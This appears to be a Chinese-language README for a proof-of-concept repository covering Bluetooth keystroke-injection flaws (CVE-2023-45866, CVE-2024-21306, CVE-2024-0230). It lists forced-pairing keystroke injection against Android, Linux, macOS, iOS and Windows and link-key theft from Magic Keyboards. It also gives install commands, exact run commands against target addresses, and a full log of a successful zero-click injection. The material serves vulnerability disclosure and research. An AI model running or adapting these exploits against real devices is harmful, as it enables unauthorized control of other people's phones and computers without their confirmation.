该仓库包含针对 CVE-2023-45866、CVE-2024-21306 和 CVE-2024-0230 的概念验证脚本。更多细节可在博客文章中查看。
| 概念验证 | 描述 |
|---|---|
| Android 按键注入 | 强制将虚拟蓝牙键盘与存在漏洞的 Android 设备配对,并注入 10 秒钟的 tab 按键。 |
| Linux 按键注入 | 强制将虚拟蓝牙键盘与 Linux 主机配对,并注入 10 秒钟的 tab 按键。 |
| macOS 按键注入 | 强制将虚拟蓝牙键盘与 macOS 主机配对,并注入按键以打开网页浏览器并执行 Google 搜索。 |
| iOS 按键注入 | 强制将虚拟蓝牙键盘与 iOS 主机配对,并注入按键以打开网页浏览器并导航到 URL。 |
| Windows 按键注入 | 强制将虚拟蓝牙键盘与 Windows 主机配对,并注入 tab 按键。 |
| 通过 Lightning 端口读取 Magic Keyboard 链接密钥 | 从 Magic Keyboard 的 Lightning 端口读取蓝牙链接密钥。 |
| 通过蓝牙读取 Magic Keyboard 链接密钥 | 从 Magic Keyboard 上未经认证的蓝牙 HID 服务读取蓝牙链接密钥。 |
| 通过 Mac 上的 USB 端口读取 Magic Keyboard 链接密钥 | 通过 USB 向与其配对的 Mac 伪装成该键盘,从而读取目标 Magic Keyboard 的蓝牙链接密钥。 |
这些脚本已知可在配备基于 Broadcom 的蓝牙适配器的 Ubuntu 22.04 主机上运行。
我主要使用了这个适配器:https://www.amazon.com/Kinivo-USB-Bluetooth-4-0-Compatible/dp/B007Q45EF4``` Bus 001 Device 026: ID 0a5c:21e8 Broadcom Corp. BCM20702A0 Bluetooth 4.0
从全新安装的 Ubuntu 22.04 开始,可以使用以下命令安装依赖项。```
# update apt
sudo apt-get update
sudo apt-get -y upgrade
# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
安全补丁级别早于 2023-12-05 的 Android 设备存在漏洞。
当未打补丁的 Android 设备启用蓝牙时,攻击者可以配对模拟蓝牙键盘并注入按键,而无需用户确认。这是一个零点击攻击,只要蓝牙处于启用状态即可生效。
此漏洞影响 Android ~4.2.2 及更高版本。
使用接口 hci1 运行针对 Android 设备 5C:F3:70:AA:07:BD 的 PoC。```
./keystroke-injection-android-linux.py -i hci1 -t 5C:F3:70:AA:07:BD
如果成功,该 PoC 将注入持续 10 秒的 `tab` 按键载荷。
#### 示例输出```
> ./keystroke-injection-android-linux.py -i hci1 -t 5C:F3:70:AA:07:BD
[2024-01-07 11:03:01.329] executing 'sudo service bluetooth restart'
[2024-01-07 11:03:01.959] configuring Bluetooth adapter
[2024-01-07 11:03:01.963] calling RegisterProfile
[2024-01-07 11:03:01.966] running dbus loop
[2024-01-07 11:03:02.096] executing 'sudo hciconfig hci1 name Hi, My Name is Keyboard'
[2024-01-07 11:03:02.108] executing 'hciconfig hci1 name'
[2024-01-07 11:03:02.128] executing 'sudo hciconfig hci1 class 0x002540'
[2024-01-07 11:03:02.141] executing 'hciconfig hci1 class'
[2024-01-07 11:03:02.144] executing 'hcitool name 5C:F3:70:AA:07:BD'
[2024-01-07 11:03:02.877] connecting to SDP
[2024-01-07 11:03:02.877] connecting to 5C:F3:70:AA:07:BD on port 1
[2024-01-07 11:03:03.832] SUCCESS! connected on port 1
[2024-01-07 11:03:03.832] executing 'sudo btmgmt --index hci1 io-cap 1'
[2024-01-07 11:03:03.847] executing 'sudo btmgmt --index hci1 ssp 1'
[2024-01-07 11:03:03.858] connected to SDP (L2CAP 1) on target
[2024-01-07 11:03:03.865] 'NoInputNoOutput' pairing-agent is running
[2024-01-07 11:03:04.111] connecting to 5C:F3:70:AA:07:BD on port 19
[2024-01-07 11:03:04.864] ERROR connecting on port 19: [Errno 22] Invalid argument
[2024-01-07 11:03:04.864] connecting to 5C:F3:70:AA:07:BD on port 17
[2024-01-07 11:03:04.932] SUCCESS! connected on port 17
[2024-01-07 11:03:04.932] connecting to HID Interrupt
[2024-01-07 11:03:04.932] connecting to 5C:F3:70:AA:07:BD on port 19
[2024-01-07 11:03:05.008] SUCCESS! connected on port 19
[2024-01-07 11:03:05.008] connected to HID Interrupt (L2CAP 19) on target
[2024-01-07 11:03:05.008] connected to HID Control (L2CAP 17) on target
[2024-01-07 11:03:05.009] [RX-17] 9000
[2024-01-07 11:03:05.009] [TX-17] 00
[2024-01-07 11:03:05.065] [RX-19] a20101
[2024-01-07 11:03:05.259] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.259] injecting Tab keypresses for 10 seconds
[2024-01-07 11:03:05.259] [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.264] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.318] [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.323] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.377] [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.382] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.436] [TX-19] a10100002b000000000000
...
[2024-01-07 11:03:15.261] [TX-19] a101000000000000000000
[2024-01-07 11:03:15.319] payload has been transmitted; disconnecting Bluetooth HID client
[2024-01-07 11:03:15.321] taking 'hci1' offline
运行 BlueZ 5 的 Linux 主机在约 2023 年 12 月补丁推出之前存在漏洞。具体版本号取决于 Linux 发行版。
当未打补丁的 Linux 主机通过蓝牙可被发现且可连接时,攻击者可以配对模拟蓝牙键盘并注入按键,而无需用户确认。这是一种零点击攻击,只要主机可被发现且可连接即可发动。
已知此漏洞会影响使用 BlueZ 5 默认配置且未打补丁的 Linux 发行版。
Google 表示 ChromeOS 不受此漏洞影响,虽然 ChromeOS 未作为本研究的一部分进行测试,但其 BlueZ 配置似乎确实能够阻止该攻击。
受影响的发行版包括 Ubuntu、Debian、Gentoo、Arch、Fedora、Red Hat、Yocto 和 Amazon Linux。多个版本可能受影响,例如 Ubuntu 已修补了 16.04、18.04、20.04、22.04、23.04 和 23.10。
使用接口 hci1 针对 Linux 主机 58:28:39:E6:AE:1C 运行 PoC。```
./keystroke-injection-android-linux.py -i hci1 -t 58:28:39:E6:AE:1C
如果成功,该 PoC 将注入一个由 `tab` 按键组成的 payload,持续 10 秒。